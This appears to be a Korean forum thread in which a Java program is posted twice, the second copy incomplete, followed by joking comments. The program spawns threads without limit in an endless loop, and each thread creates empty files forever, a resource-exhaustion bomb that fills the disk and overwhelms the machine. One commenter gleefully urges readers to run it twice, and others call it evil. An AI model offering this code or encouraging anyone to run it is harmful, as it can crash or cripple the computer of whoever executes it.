public class Main {
public static void main(String[] args) { new Main(); }
public Main() {
while (true) {
new Thread() {
@Override
public void run() {
while (true) {
for (long l=0; ; l++) {
File file = new File(Long.toString(System.currentTimeMillis()) + "_" + String.format("%016x", l) + ".txt");
if (!file.exists()) {
try { file.createNewFile(); } catch (Exception e) { }
break;
}
}
}
}
}.start();
}
}
}
public static void main(String[] args) { new Main(); }
public Main() {
while (true) {
new Thread() {
@Override
public void run() {
while (true) {
for (long l=0; ; l++) {
File file = new File(Long.toString(System.currentTimeMillis()) + "_" + String.format("%016x", l) + ".txt");
if (!file.exists()) {
try { file.createNewFile(); } catch (Exception e) { }
break;
}
}
}
}
}.start();
}
}
}
으악 내눈 ㅠ
zㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ실행해봐라 두 번 실행해라 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
이런 시발놈 존나사악하네